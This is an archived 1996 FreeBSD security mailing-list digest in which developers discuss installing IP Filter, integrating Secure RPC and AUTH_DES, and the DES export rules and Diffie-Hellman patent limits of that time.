From owner-freebsd-security Sun Nov 10 17:04:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA03607 for security-outgoing; Sun, 10 Nov 1996 17:04:22 -0800 (PST) Received: from tulpi.interconnect.com.au (root@tulpi.interconnect.com.au [192.189.54.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA03598 for ; Sun, 10 Nov 1996 17:04:19 -0800 (PST) Received: (from ahill@localhost) by tulpi.interconnect.com.au id MAA12509 (8.7.6/IDA-1.6); Mon, 11 Nov 1996 12:03:13 +1100 (EST) Date: Mon, 11 Nov 1996 12:03:12 +1100 (EST) From: Anthony Hill To: Jerry Kelley cc: freebsd-security@freebsd.org Subject: Re: Anyone have info on IP Filter build & install for FreeBSD? In-Reply-To: <32816280.41C67EA6@iquest.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 6 Nov 1996, Jerry Kelley wrote: > I'm looking at the IP Filter program and am wondering if anyone has got > it up and running with FreeBSD. If so, I'd like just a few brief hints > on the instructions from the INSTALL.xBSD file that comes with it. Are > there any changes to this info for FreeBSD or can I just follow the > info in there "as-is" without modification? > > Is there anywhere I can get more info on IP Filter? Are there any web > pages that have some links to docs or any other info that might be of > use? Ran straight out of the box for me using the xBSD config. There is a web page at http://cheops.anu.edu.au/~avalon/ which is not completely unhelpful. regards, Anthony Hill ahill@connect.com.au From owner-freebsd-security Tue Nov 12 08:59:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA05583 for security-outgoing; Tue, 12 Nov 1996 08:59:08 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA05561 for ; Tue, 12 Nov 1996 08:58:46 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id LAA22844 for freebsd-security@freebsd.org; Tue, 12 Nov 1996 11:58:20 -0500 From: Bill Paul Message-Id: <199611121658.LAA22844@skynet.ctr.columbia.edu> Subject: Secure RPC revisited To: freebsd-security@freebsd.org Date: Tue, 12 Nov 1996 11:58:19 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Okay, I just have to ask this. We (that is, myself and Mark Murray, basically) held back on incorporating Secure RPC into the base FreeBSD distribution for the following reasons: - Secure RPC uses DES. - Secure RPC also uses Diffie-Hellman key exchange, which is subject to a patent until some time in late 1997. Note that excluding the above two problems, Secure RPC itself is not subject to any export restrictions since it doesn't actually encrypt any data in RPC transactions: it encrypts only timestamps for authentication purposes. This is how Sun and the other big vendors can legally export their OSes out of the country. (They do not export the actual DES support however: you need to obtain a kit for that, meaning that while you may have Secure RPC, it may not actually work properly until the encryption kit is installed.) The DES problem can be dealt with (in an admittedly messy fashion) by providing a dummy crypto library that exports a fake _des_crypt() function. (What the fake function would do is open for debate. Anything from simple bit inversion to rot13 is acceptable.) This would prevent Secure RPC from working with anything besides another FreeBSD machine until the real crypto library is installed, but unless our government wakes up and smells the toast burning, we'll just have to deal with it. The Diffie-Hellman issue is another matter. My understanding (which may in fact be totally wrong) is that it's not possible to use code which implements Diffie-Hellman without paying a licensing fee to RSA (or whoever it is this week). But the patent in question is supposed to expire in 1997, thus we bide our time, all the while plotting to overthrow the earth and cackling maniacally to ourselves. (Alright, maybe it's just me.) But now I'm confused. Recently, the multimedia network lab decided to buy a copy of Redhat Linux (version 3.0.3) for some project or another. (Yes, I argued FreeBSD's case, but I was shot down. Just wait until I rule the world: then I'll show 'em...) Anyway, I poked around in it a bit and what did I find? Yes, you guessed it: Secure RPC support. They even have a stripped down DES implementation just to make it work. Now, I don't think that Redhat has seperate export and domestic versions of their CDs, so whatever they ship here, they must ship overseas. And I'm pretty sure they're based in the US. So could somebody please explain to me: how is it that Redhat can ship Secure RPC support right now and we can't? Did they just do it and hope nobody would notice (or care)? Did they pay money to RSA? Do they just happen to know the secret handshake? Somebody please tell me yes or no: are we allowed to ship Secure RPC (minus DES, if necessary) with FreeBSD? (Note that suggesting that I look at a web page somewhere does not qualify as a yes or no answer.) I'm bringing this up again since it has direct bearing on NIS+, which needs AUTH_DES to be at all useful. I want very much to merge AUTH_DES support into FreeBSD so that NIS+ can basically drop right in (when I finally finish it). This would also imply importing a dummy crypto library. There was some talk of this back when the Secure RPC issue was first raised, but like most things that get talked about, nothing much ever came of it. While I'm on the subject, I also want to add support for an AF_UNIX socket transport. This would make it possible for processes on the same host to communicate without using IP, thus removing the threat of IP spoofing. I faked up something for this in rpc.yppasswdd, but it would be nice to have it integrated into the RPC library. Keyserv and possibly portmap would benefit a great deal from a 'local only' transport. It would be analagous to the loopback transport in TI-RPC on Slowlaris, but done with AF_UNIX sockets since we don't have STREAMS/TLI. (The TI-RPC loopback transport has what appears to be a bit of an advantage over unix domain sockets, which is that it is possible using t_getinfo() to determine the UID of the caller on the other end of the link. With sockets, all you can do is set the ownership and permissions of the socket special file in the filesystem to restrict access to certain people, which isn't as flexible.) So! Secure RPC integration! Legal bogosities! Discuss! -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Tue Nov 12 14:52:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA02270 for security-outgoing; Tue, 12 Nov 1996 14:52:36 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA02258 for ; Tue, 12 Nov 1996 14:52:22 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id RAA23543 for freebsd-security@freebsd.org; Tue, 12 Nov 1996 17:51:48 -0500 From: Bill Paul Message-Id: <199611122251.RAA23543@skynet.ctr.columbia.edu> Subject: Re: Secure RPC revisited To: freebsd-security@freebsd.org Date: Tue, 12 Nov 1996 17:51:47 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Well, I got tired of wondering about how Redhat was able to ship Secure RPC with their distribution, so I asked them (via the 'feedback' selection on their web site). This is what they said: ---begin snippage: To: wpaul@ctr.columbia.edu Subject: Re: http://www.redhat.com/ In-reply-to: Your message of "Tue, 12 Nov 1996 19:16:32 GMT." <199611121916.TAA06823@www.redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 12 Nov 1996 16:24:17 -0500 From: RHS Linux User Thank for your interest in Red Hat Software. The version of the RPC that we have on our Cds is licensed on the GNU and is therefore freely available and usable to all users. Best Regards Red Hat Software ----end snippage I think he's trying to say that their code is covered by the GNU copyleft (presumeably as part of their entire 'product' which in this case would be their Linux distribution). I don't think they can say that, since the SunRPC code is already copyrighted by Sun Microsystems. It also doesn't address the fact that the GNU copyleft offers no protection whatsoever against the (admittedly stupid) US export laws that forbid exporting DES code. I think I'm going to try to bump this along to the next idiot in the chain and see what they have to say about this. -Bill PS: Is there a non-US person around with a Redhat Linux CD-ROM set handy? If so, can you check to see whether your version of libc has Secure RPC and DES? (Do an 'nm /usr/lib/libc.a | grep des' and look for 'des_impl.o' which is the object that has the _des_crypt() function in it. If you see that, then you have DES. If you have 'auth_des.o' then you have Secure RPC.) I'm starting to wonder if maybe the Redhat people may have put their foot in it. -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Tue Nov 12 16:19:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA06315 for security-outgoing; Tue, 12 Nov 1996 16:19:21 -0800 (PST) Received: from gateway.contact.com.sg (gateway.contact.com.sg [203.120.144.21]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA06286 for ; Tue, 12 Nov 1996 16:19:05 -0800 (PST) Received: from hello.contact.com.sg ([203.120.144.35]) by gateway.contact.com.sg (Netscape Mail Server v1.1) with ESMTP id AAA21812 for ; Wed, 13 Nov 1996 08:13:57 +0800 From: "Gerald Quek IMO" To: Date: Wed, 13 Nov 1996 08:21:49 +0800 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19961113001357.AAA21812@hello.contact.com.sg> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk lists From owner-freebsd-security Wed Nov 13 00:06:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA01612 for security-outgoing; Wed, 13 Nov 1996 00:06:45 -0800 (PST) Received: from gw-nl1.philips.com (gw-nl1.philips.com [192.68.44.33]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA01607 for ; Wed, 13 Nov 1996 00:06:42 -0800 (PST) Received: (from nobody@localhost) by gw-nl1.philips.com (8.6.10/8.6.10-0.994n-08Nov95) id JAA22230; Wed, 13 Nov 1996 09:06:31 +0100 Received: from unknown(130.139.36.3) by gw-nl1.philips.com via smap (V1.3+ESMTP) with ESMTP id sma022148; Wed Nov 13 09:05:54 1996 Received: from spooky.lss.cp.philips.com (spooky.lss.cp.philips.com [130.144.199.105]) by smtprelay.nl.cis.philips.com (8.6.10/8.6.10-1.2.1m-961030) with ESMTP id JAA09179; Wed, 13 Nov 1996 09:05:53 +0100 Received: (from guido@localhost) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) id JAA02443; Wed, 13 Nov 1996 09:05:53 +0100 From: Guido van Rooij Message-Id: <199611130805.JAA02443@spooky.lss.cp.philips.com> Subject: Re: Secure RPC revisited To: wpaul@skynet.ctr.columbia.edu (Bill Paul) Date: Wed, 13 Nov 1996 09:05:52 +0100 (MET) Cc: freebsd-security@freebsd.org Reply-To: Guido.vanRooij@nl.cis.philips.com In-Reply-To: <199611121658.LAA22844@skynet.ctr.columbia.edu> from Bill Paul at "Nov 12, 96 11:58:19 am" X-Mailer: ELM [version 2.4ME+ PL19 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > The Diffie-Hellman issue is another matter. My understanding (which may > in fact be totally wrong) is that it's not possible to use code which > implements Diffie-Hellman without paying a licensing fee to RSA (or whoever > it is this week). But the patent in question is supposed to expire in 1997, > thus we bide our time, all the while plotting to overthrow the earth and > cackling maniacally to ourselves. (Alright, maybe it's just me.) > I thought SSH also used diffie hellman. It seems they don't have a problem. Exactly *where* is the patent living? If it is only in the states, we might just install it on the internat repository? -Guido From owner-freebsd-security Wed Nov 13 12:26:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA13091 for security-outgoing; Wed, 13 Nov 1996 12:26:20 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA13079 for ; Wed, 13 Nov 1996 12:26:16 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id PAA25119; Wed, 13 Nov 1996 15:24:22 -0500 From: Bill Paul Message-Id: <199611132024.PAA25119@skynet.ctr.columbia.edu> Subject: Re: Re[2]: Secure RPC revisited To: will.kempf@firstdatacorp.com (Will Kempf) Date: Wed, 13 Nov 1996 15:24:20 -0500 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Will Kempf" at Nov 13, 96 09:33:00 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Will Kempf had to walk into mine and say: > Is it possible (probable) that since Linus is in Finland > (Denmark?) > that he's using one of the internationally-available > implementations > of DES? It's not a question of where Linus is or what he's using. Linus doesn't distribute Redhat Linux (though he may use it for all I know). In fact, Linus doesn't distribute the Linux libc implementation at all: from what I know, he just distributes the kernel. The point is that the Redhat people, who are based in the United States as far as I can tell, are shipping Redhat Linux CDs from the U.S. to places outside of the U.S. with DES encryption software on them. (I suppose they're also making it available via FTP too. There are lots of Redhat mirror sites around.) The law, dumb as it is, says that you can't do that. You can actually ship encryption code into the U.S. but once it's here, you can't ship it back out again. Silly? You bet. But the rule applies to code which uses more than 40 bits for its key, and DES uses 56-bit keys, so there you have it. This is why you have export and domestic versions of Netscape (*spit*) and why FreeBSD CDs don't come with the DES distribution included; you have to download it seperately from a nearby FTP site (meaning if you're outside the U.S., you need to get it from a non-U.S. FTP server). (As an aside, I wonder if it would be possible to put the DES distribution on a floppy and include it when Walnut Creek mails a FreeBSD CD to someone with a U.S. mailing address. But that's for Walnut Creek to decide.) It would seem that other Linux distributions that use the same libc are in the same boat: I believe Slackware has the same Secure RPC and DES code in it. If any of these Linux distributors have mailed CDs to overseas addresses with DES code on them, then technically they've broken the law and could go to jail and/or be fined a lot of money. My point is that it's just not fair that we should be going to all this trouble to abide by the law while the Linux distributors just thumb their noses at it. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Wed Nov 13 12:44:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA14660 for security-outgoing; Wed, 13 Nov 1996 12:44:43 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA14653 for ; Wed, 13 Nov 1996 12:44:38 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id PAA25158; Wed, 13 Nov 1996 15:44:10 -0500 From: Bill Paul Message-Id: <199611132044.PAA25158@skynet.ctr.columbia.edu> Subject: Re: Secure RPC revisited To: Guido.vanRooij@nl.cis.philips.com Date: Wed, 13 Nov 1996 15:44:09 -0500 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com> from "Guido van Rooij" at Nov 13, 96 09:05:52 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Guido van Rooij had to walk into mine and say: > > > > The Diffie-Hellman issue is another matter. My understanding (which may > > in fact be totally wrong) is that it's not possible to use code which > > implements Diffie-Hellman without paying a licensing fee to RSA (or whoever > > it is this week). But the patent in question is supposed to expire in 1997, > > thus we bide our time, all the while plotting to overthrow the earth and > > cackling maniacally to ourselves. (Alright, maybe it's just me.) > > > > I thought SSH also used diffie hellman. It seems they don't have a problem. I'm not sure it's the same, although I wouldn't mind being proven wrong. > Exactly *where* is the patent living? If it is only in the states, we > might just install it on the internat repository? The problem with Secure RPC is that it needs to be integrated with the existing RPC library (I'm not even considering the kernel -- somebody else can agonize over that), and the RPC library lives in libc. If we have a seperate kit for adding Secure RPC, like we currently have for DES, we need to provide a new libc which the user has to swap for his existing one. Replacing libc is a sticky business and I submit that it's best to avoid forcing the user to do this. I confess that I don't know enough about patent law to say how much of this nonsense applies outside the U.S. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." ============================================================================= From owner-freebsd-security Wed Nov 13 12:53:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA15280 for security-outgoing; Wed, 13 Nov 1996 12:53:37 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA15272; Wed, 13 Nov 1996 12:53:33 -0800 (PST) Received: from critter.tfs.com (localhost.dk.tfs.com [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id VAA01714; Wed, 13 Nov 1996 21:53:12 +0100 (MET) To: Bill Paul cc: will.kempf@firstdatacorp.com (Will Kempf), freebsd-security@freebsd.org Subject: Re: Re[2]: Secure RPC revisited In-reply-to: Your message of "Wed, 13 Nov 1996 15:24:20 EST." <199611132024.PAA25119@skynet.ctr.columbia.edu> Date: Wed, 13 Nov 1996 21:53:12 +0100 Message-ID: <1712.847918392@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199611132024.PAA25119@skynet.ctr.columbia.edu>, Bill Paul writes: >It would seem that other Linux distributions that use the same libc are >in the same boat: I believe Slackware has the same Secure RPC and DES >code in it. If any of these Linux distributors have mailed CDs to >overseas addresses with DES code on them, then technically they've broken >the law and could go to jail and/or be fined a lot of money. > >My point is that it's just not fair that we should be going to all >this trouble to abide by the law while the Linux distributors just >thumb their noses at it. Well, that's one way to interpret this. The other one is to call the DoD, who is more than eager to show how much the damage to national safety would be, if you could export sources for encryption tools, and who is looking for cases... no, no, no! I didn't really mean that seriously!!!! Then again... -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Wed Nov 13 13:10:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA16600 for security-outgoing; Wed, 13 Nov 1996 13:10:45 -0800 (PST) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA16579 for ; Wed, 13 Nov 1996 13:10:29 -0800 (PST) Received: by halloran-eldar.lcs.mit.edu; (5.65v3.2/1.1.8.2/19Aug95-0530PM) id AA20266; Wed, 13 Nov 1996 16:08:25 -0500 Date: Wed, 13 Nov 1996 16:08:25 -0500 From: Garrett Wollman Message-Id: <9611132108.AA20266@halloran-eldar.lcs.mit.edu> To: Poul-Henning Kamp Cc: Bill Paul , will.kempf@firstdatacorp.com (Will Kempf), freebsd-security@freebsd.org Subject: Re: Re[2]: Secure RPC revisited In-Reply-To: <1712.847918392@critter.tfs.com> References: <199611132024.PAA25119@skynet.ctr.columbia.edu> <1712.847918392@critter.tfs.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk < said: > The other one is to call the DoD, who is more than eager to show how > much the damage to national safety would be, if you could export > sources for encryption tools, and who is looking for cases... DoD doesn't really care much. (The Intelligence Community doesn't much care either...they can read anything encrypted with DES anyway.) It's the State Department who care the most (because it's their bailiwick), with support from the Justice Department (because they don't want anyone to have privacy and see export controls as a way to discourage development of all crypto software). -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, ANA, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Wed Nov 13 13:30:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA17632 for security-outgoing; Wed, 13 Nov 1996 13:30:50 -0800 (PST) Received: from ns2.harborcom.net (bradley@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA17627 for ; Wed, 13 Nov 1996 13:30:45 -0800 (PST) Received: from localhost (bradley@localhost) by ns2.harborcom.net (8.7.6/8.6.12) with SMTP id QAA10253; Wed, 13 Nov 1996 16:30:32 -0500 (EST) Date: Wed, 13 Nov 1996 16:30:31 -0500 (EST) From: Bradley Dunn X-Sender: bradley@ns2.harborcom.net Reply-To: Bradley Dunn To: Guido van Rooij cc: freebsd-security@FreeBSD.ORG Subject: Re: Secure RPC revisited In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 13 Nov 1996, Guido van Rooij wrote: > > The Diffie-Hellman issue is another matter. My understanding (which may > > in fact be totally wrong) is that it's not possible to use code which > > implements Diffie-Hellman without paying a licensing fee to RSA (or whoever > > it is this week). But the patent in question is supposed to expire in 1997, > > thus we bide our time, all the while plotting to overthrow the earth and > > cackling maniacally to ourselves. (Alright, maybe it's just me.) > > > > I thought SSH also used diffie hellman. It seems they don't have a problem. > Exactly *where* is the patent living? If it is only in the states, we > might just install it on the internat repository? This is all IMHO, and IANAL, etc, etc...in other words, don't sue me when RSA starts banging down your door. :-) I did a little bit of research on this when I was looking into the possibilty of a free SSL-enabled HTTP server. RSA appears to claim its patent covers all forms of public-key cryptography and authentication. RSA licenses its patent as follows: -Non-commercial use is free -Commercial users must license it for a fee. See the agreement at: http://www.rsa.com/rsa/contracts/PatLicAgree.html >From what I have heard, RSA, not surprisingly, defines commercial use broadly and non-commercial use narrowly. And speaking of SSH, I have not installed it on our (we are an ISP) servers. I do not think we can without signing a license with RSA, or buying someone's product based on SSH that is licensed from RSA. We sell access to those servers for a fee, thus it could be construed that we would be selling a service based on RSA-patented technology. http://www.epm.ornl.gov/~dunigan/rsaref.txt may also be of use. The section titled: WHAT YOU CAN (AND CANNOT) DO WITH RSAREF should be a pretty good guide on the rules covering code using Diffie-Hellman, even if the code was written without the use of RSAref. This only applies to the US. Outside of the US RSA's patent means nothing. Sometimes it sucks to be an American. :( -BD From owner-freebsd-security Wed Nov 13 21:33:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA14911 for security-outgoing; Wed, 13 Nov 1996 21:33:08 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA14900 for ; Wed, 13 Nov 1996 21:32:50 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id GAA06258 for ; Thu, 14 Nov 1996 06:31:37 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id GAA09763 for freebsd-security@FreeBSD.ORG; Thu, 14 Nov 1996 06:31:13 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id BAA04227; Thu, 14 Nov 1996 01:07:57 +0100 (MET) Message-ID: Date: Thu, 14 Nov 1996 01:07:57 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.ORG Subject: Re: Secure RPC revisited References: <199611121658.LAA22844@skynet.ctr.columbia.edu> <199611130805.JAA02443@spooky.lss.cp.philips.com> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com>; from Guido van Rooij on Nov 13, 1996 09:05:52 +0100 Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk According to Guido van Rooij: > I thought SSH also used diffie hellman. It seems they don't have a problem. No, SSH is not using Diffie-Hellman. Stel is [was] using it. SSH uses its own RSA-based challenge-response scheme. > Exactly *where* is the patent living? If it is only in the states, we > might just install it on the internat repository? I think -- but may be wrong -- that the patent is for the US only. Maybe some other countries as well if only because of Berne... -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Wed Nov 13 21:53:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA16190 for security-outgoing; Wed, 13 Nov 1996 21:53:22 -0800 (PST) Received: from assaris.sics.se (assaris.sics.se [193.10.66.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA16148 for ; Wed, 13 Nov 1996 21:53:14 -0800 (PST) Received: (from assar@localhost) by assaris.sics.se (8.7.5/8.7.3) id GAA18043; Thu, 14 Nov 1996 06:50:47 +0100 (MET) To: Bill Paul Cc: Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: <199611132044.PAA25158@skynet.ctr.columbia.edu> Mime-Version: 1.0 (generated by tm-edit 7.68) Content-Type: text/plain; charset=US-ASCII From: Assar Westerlund Date: 14 Nov 1996 06:50:44 +0100 In-Reply-To: Bill Paul's message of Wed, 13 Nov 1996 15:44:09 -0500 (EST) Message-ID: <5ld8xhb4y3.fsf@assaris.sics.se> Lines: 22 X-Mailer: Gnus v5.2.40/Emacs 19.34 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Bill Paul writes: > > I thought SSH also used diffie hellman. It seems they don't have a problem. > > I'm not sure it's the same, although I wouldn't mind being proven wrong. I believe SSH uses RSA. > > Exactly *where* is the patent living? If it is only in the states, we > > might just install it on the internat repository? > > > I confess that I don't know enough about patent law to say how much of > this nonsense applies outside the U.S. Diffie-Hellman is only patented in the US and Canada. And those patents will expire the 27th of April 1997. (It's unfortunately not the case that you cannot have such silly patents outside of the US, just that the most common encryption algorithms are not patented there.) /asar From owner-freebsd-security Wed Nov 13 23:04:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA19136 for security-outgoing; Wed, 13 Nov 1996 23:04:16 -0800 (PST) Received: from panda.hilink.com.au (panda.hilink.com.au [203.2.144.5]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA19070 for ; Wed, 13 Nov 1996 23:04:03 -0800 (PST) Received: (from danny@localhost) by panda.hilink.com.au (8.7.6/8.7.3) id SAA02841; Thu, 14 Nov 1996 18:02:24 +1100 (EST) Date: Thu, 14 Nov 1996 18:02:24 +1100 (EST) From: "Daniel O'Callaghan" To: Assar Westerlund cc: Bill Paul , Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org Subject: Re: Secure RPC revisited In-Reply-To: <5ld8xhb4y3.fsf@assaris.sics.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On 14 Nov 1996, Assar Westerlund wrote: > Diffie-Hellman is only patented in the US and Canada. And those > patents will expire the 27th of April 1997. > > (It's unfortunately not the case that you cannot have such silly > patents outside of the US, just that the most common encryption > algorithms are not patented there.) THe algorithms are export controlled. PKP is probably not allowed to export the algorithm for the purposes of obtaining a patent! Danny From owner-freebsd-security Thu Nov 14 00:29:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA23494 for security-outgoing; Thu, 14 Nov 1996 00:29:36 -0800 (PST) Received: from assaris.sics.se (assaris.sics.se [193.10.66.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA23487 for ; Thu, 14 Nov 1996 00:29:28 -0800 (PST) Received: (from assar@localhost) by assaris.sics.se (8.7.5/8.7.3) id JAA18312; Thu, 14 Nov 1996 09:29:04 +0100 (MET) To: "Daniel O'Callaghan" Cc: Bill Paul , Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: Mime-Version: 1.0 (generated by tm-edit 7.68) Content-Type: text/plain; charset=US-ASCII From: Assar Westerlund Date: 14 Nov 1996 09:29:01 +0100 In-Reply-To: "Daniel O'Callaghan"'s message of Thu, 14 Nov 1996 18:02:24 +1100 (EST) Message-ID: <5l7mnpaxma.fsf@assaris.sics.se> Lines: 24 X-Mailer: Gnus v5.2.40/Emacs 19.34 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk "Daniel O'Callaghan" writes: > On 14 Nov 1996, Assar Westerlund wrote: > > > Diffie-Hellman is only patented in the US and Canada. And those > > patents will expire the 27th of April 1997. > > > > (It's unfortunately not the case that you cannot have such silly > > patents outside of the US, just that the most common encryption > > algorithms are not patented there.) > > THe algorithms are export controlled. PKP is probably not allowed to > export the algorithm for the purposes of obtaining a patent! Isn't it only the implementation of the algorithms as computer programs that's export controlled? I think you can send in your patent application on paper. Two other variables in the game is that in the US you can patent something that you have published some time later and that if you're unlucky the NSA says your invention is intresting and will steal it for "national security" reasons. So the "right way" is to first send in the application to EPC (European Patent Office), then to the US Patent Office, and then publish it. But I think we're getting a bit off topic... :) /assar From owner-freebsd-security Thu Nov 14 01:45:55 1996 Return-Path: owner-security Received: (from root@localhost) by 